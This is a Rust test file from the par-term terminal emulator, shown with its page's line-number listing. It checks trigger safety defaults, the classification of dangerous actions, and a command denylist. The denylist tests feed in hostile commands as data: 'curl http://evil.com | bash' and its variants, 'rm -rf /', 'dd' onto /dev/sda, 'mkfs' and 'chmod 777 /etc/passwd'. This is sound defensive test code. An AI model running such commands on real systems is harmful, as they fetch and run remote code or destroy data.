par-term 0.30.10

Cross-platform GPU-accelerated terminal emulator with inline graphics support (Sixel, iTerm2, Kitty)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351

//! Tests for automation security — command denylist, prompt_before_run field,
//! and the is_dangerous classification for trigger actions.

use par_term::config::automation::PrettifyScope;
use par_term::config::{TriggerActionConfig, TriggerConfig, check_command_denylist};

// ============================================================================
// Trigger Security Tests
// ============================================================================

#[test]
fn test_prompt_before_run_defaults_to_true() {
    // When not specified in YAML, prompt_before_run defaults to true (safe)
    let yaml = r#"
name: test
pattern: "foo"
actions:
  - type: run_command
    command: echo
    args: ["hello"]
"#;
    let trigger: TriggerConfig = serde_yaml_ng::from_str(yaml).unwrap();
    assert!(
        trigger.prompt_before_run,
        "prompt_before_run should default to true for safety"
    );
}

#[test]
fn test_prompt_before_run_explicit_false() {
    let yaml = r#"
name: test
pattern: "foo"
prompt_before_run: false
actions:
  - type: run_command
    command: echo
    args: ["hello"]
"#;
    let trigger: TriggerConfig = serde_yaml_ng::from_str(yaml).unwrap();
    assert!(
        !trigger.prompt_before_run,
        "prompt_before_run should be false when explicitly set"
    );
}

#[test]
fn test_prompt_before_run_roundtrip() {
    let trigger = TriggerConfig {
        name: "test".to_string(),
        pattern: "foo".to_string(),
        enabled: true,
        actions: vec![TriggerActionConfig::RunCommand {
            command: "echo".into(),
            args: vec!["hello".into()],
        }],
        prompt_before_run: false,
        i_accept_the_risk: false,
    };

    let yaml = serde_yaml_ng::to_string(&trigger).unwrap();
    let deserialized: TriggerConfig = serde_yaml_ng::from_str(&yaml).unwrap();
    assert_eq!(trigger, deserialized);
    assert!(!deserialized.prompt_before_run);
}

#[test]
fn test_backward_compat_require_user_action_alias() {
    // Verify the old field name `require_user_action` still deserializes
    // correctly via the serde alias for backward compatibility.
    let yaml = r#"
name: test
pattern: "foo"
require_user_action: false
actions:
  - type: run_command
    command: echo
    args: ["hello"]
"#;
    let trigger: TriggerConfig = serde_yaml_ng::from_str(yaml).unwrap();
    assert!(
        !trigger.prompt_before_run,
        "require_user_action alias should deserialize to prompt_before_run=false"
    );
}

#[test]
fn test_is_dangerous_run_command() {
    let action = TriggerActionConfig::RunCommand {
        command: "echo".into(),
        args: vec![],
    };
    assert!(action.is_dangerous(), "RunCommand should be dangerous");
}

#[test]
fn test_is_dangerous_send_text() {
    let action = TriggerActionConfig::SendText {
        text: "hello".into(),
        delay_ms: 0,
    };
    assert!(action.is_dangerous(), "SendText should be dangerous");
}

#[test]
fn test_is_not_dangerous_highlight() {
    let action = TriggerActionConfig::Highlight {
        fg: None,
        bg: None,
        duration_ms: 5000,
    };
    assert!(!action.is_dangerous(), "Highlight should not be dangerous");
}

#[test]
fn test_is_not_dangerous_notify() {
    let action = TriggerActionConfig::Notify {
        title: "t".into(),
        message: "m".into(),
    };
    assert!(!action.is_dangerous(), "Notify should not be dangerous");
}

#[test]
fn test_is_not_dangerous_mark_line() {
    let action = TriggerActionConfig::MarkLine {
        label: None,
        color: None,
    };
    assert!(!action.is_dangerous(), "MarkLine should not be dangerous");
}

#[test]
fn test_is_not_dangerous_set_variable() {
    let action = TriggerActionConfig::SetVariable {
        name: "n".into(),
        value: "v".into(),
    };
    assert!(
        !action.is_dangerous(),
        "SetVariable should not be dangerous"
    );
}

#[test]
fn test_is_not_dangerous_play_sound() {
    let action = TriggerActionConfig::PlaySound {
        sound_id: "bell".into(),
        volume: 50,
    };
    assert!(!action.is_dangerous(), "PlaySound should not be dangerous");
}

#[test]
fn test_is_not_dangerous_prettify() {
    let action = TriggerActionConfig::Prettify {
        format: "json".into(),
        scope: PrettifyScope::CommandOutput,
        block_end: None,
        sub_format: None,
        command_filter: None,
    };
    assert!(!action.is_dangerous(), "Prettify should not be dangerous");
}

// ============================================================================
// Command Denylist Tests
// ============================================================================

#[test]
fn test_denylist_blocks_rm_rf_root() {
    let result = check_command_denylist("rm", &["-rf".into(), "/".into()]);
    assert!(result.is_some(), "rm -rf / should be denied");
}

#[test]
fn test_denylist_blocks_rm_rf_home() {
    let result = check_command_denylist("rm", &["-rf".into(), "~".into()]);
    assert!(result.is_some(), "rm -rf ~ should be denied");
}

#[test]
fn test_denylist_blocks_curl_pipe_bash() {
    // Direct pipe-to-shell pattern in a single command argument
    let result = check_command_denylist("bash", &["-c".into(), "curl http://evil.com|bash".into()]);
    assert!(result.is_some(), "curl|bash in args should be denied");

    // Also catches the spaced variant
    let result =
        check_command_denylist("bash", &["-c".into(), "curl http://evil.com | bash".into()]);
    assert!(result.is_some(), "curl | bash in args should be denied");
}

#[test]
fn test_denylist_blocks_eval() {
    let result = check_command_denylist("eval", &["malicious_code".into()]);
    assert!(result.is_some(), "eval should be denied");
}

#[test]
fn test_denylist_blocks_exec() {
    let result = check_command_denylist("exec", &["/bin/sh".into()]);
    assert!(result.is_some(), "exec should be denied");
}

#[test]
fn test_denylist_blocks_chmod_777() {
    let result = check_command_denylist("chmod", &["777".into(), "/etc/passwd".into()]);
    assert!(result.is_some(), "chmod 777 should be denied");
}

#[test]
fn test_denylist_blocks_mkfs() {
    let result = check_command_denylist("mkfs.ext4", &["/dev/sda1".into()]);
    assert!(result.is_some(), "mkfs should be denied");
}

#[test]
fn test_denylist_allows_safe_commands() {
    let result = check_command_denylist("echo", &["hello".into()]);
    assert!(result.is_none(), "echo should be allowed");
}

#[test]
fn test_denylist_allows_notify_send() {
    let result = check_command_denylist("notify-send", &["Build completed".into()]);
    assert!(result.is_none(), "notify-send should be allowed");
}

#[test]
fn test_denylist_allows_cat() {
    let result = check_command_denylist("cat", &["/tmp/output.txt".into()]);
    assert!(result.is_none(), "cat should be allowed");
}

#[test]
fn test_denylist_case_insensitive() {
    let result = check_command_denylist("EVAL", &["something".into()]);
    assert!(
        result.is_some(),
        "denylist check should be case-insensitive"
    );
}

#[test]
fn test_denylist_blocks_dd() {
    let result = check_command_denylist("dd", &["if=/dev/zero".into(), "of=/dev/sda".into()]);
    assert!(result.is_some(), "dd if= should be denied");
}

#[test]
fn test_denylist_blocks_sh_c_wrapper() {
    // sh -c with dangerous payload should be denied via wrapper detection
    let result = check_command_denylist("sh", &["-c".into(), "echo hello".into()]);
    assert!(result.is_some(), "sh -c wrapper should be denied");
}

#[test]
fn test_denylist_blocks_bash_c_wrapper() {
    let result = check_command_denylist("bash", &["-c".into(), "echo hello".into()]);
    assert!(result.is_some(), "bash -c wrapper should be denied");
}

#[test]
fn test_denylist_blocks_zsh_c_wrapper() {
    let result = check_command_denylist("zsh", &["-c".into(), "echo hello".into()]);
    assert!(result.is_some(), "zsh -c wrapper should be denied");
}

#[test]
fn test_denylist_blocks_env_rm_rf() {
    // /usr/bin/env rm -rf / should be caught: env wrapper stripped, then rm -rf / matches
    let result = check_command_denylist("/usr/bin/env", &["rm".into(), "-rf".into(), "/".into()]);
    assert!(result.is_some(), "/usr/bin/env rm -rf / should be denied");
}

#[test]
fn test_denylist_blocks_env_wrapper_simple() {
    // env <cmd> — the env wrapper itself should be stripped and the remainder re-checked
    let result = check_command_denylist("env", &["rm".into(), "-rf".into(), "/".into()]);
    assert!(result.is_some(), "env rm -rf / should be denied");
}

#[test]
fn test_denylist_blocks_pipe_to_zsh() {
    // curl output piped to zsh should be denied
    let result =
        check_command_denylist("bash", &["-c".into(), "curl http://evil.com | zsh".into()]);
    assert!(result.is_some(), "curl | zsh in args should be denied");
}

#[test]
fn test_denylist_blocks_pipe_to_fish() {
    let result =
        check_command_denylist("bash", &["-c".into(), "curl http://evil.com | fish".into()]);
    assert!(result.is_some(), "curl | fish in args should be denied");
}

// ============================================================================
// Backward Compatibility Tests
// ============================================================================

#[test]
fn test_existing_config_without_prompt_before_run_gets_safe_default() {
    // Simulate an existing config YAML that doesn't have prompt_before_run
    let yaml = r#"
name: old-trigger
pattern: "error"
enabled: true
actions:
  - type: run_command
    command: notify-send
    args: ["Error detected"]
"#;
    let trigger: TriggerConfig = serde_yaml_ng::from_str(yaml).unwrap();
    assert!(
        trigger.prompt_before_run,
        "Existing configs without prompt_before_run should get the safe default (true)"
    );
}

#[test]
fn test_trigger_with_only_safe_actions_not_affected() {
    // Triggers that only have safe actions (Highlight, Notify, etc.) are not affected
    // by prompt_before_run at all
    let trigger = TriggerConfig {
        name: "safe-trigger".to_string(),
        pattern: "ERROR".to_string(),
        enabled: true,
        actions: vec![
            TriggerActionConfig::Highlight {
                fg: Some([255, 0, 0]),
                bg: None,
                duration_ms: 5000,
            },
            TriggerActionConfig::Notify {
                title: "Error".into(),
                message: "Found error".into(),
            },
            TriggerActionConfig::MarkLine {
                label: Some("error".into()),
                color: Some([255, 0, 0]),
            },
        ],
        prompt_before_run: true,
        i_accept_the_risk: false,
    };

    // None of these actions are dangerous
    assert!(!trigger.actions.iter().any(|a| a.is_dangerous()));
}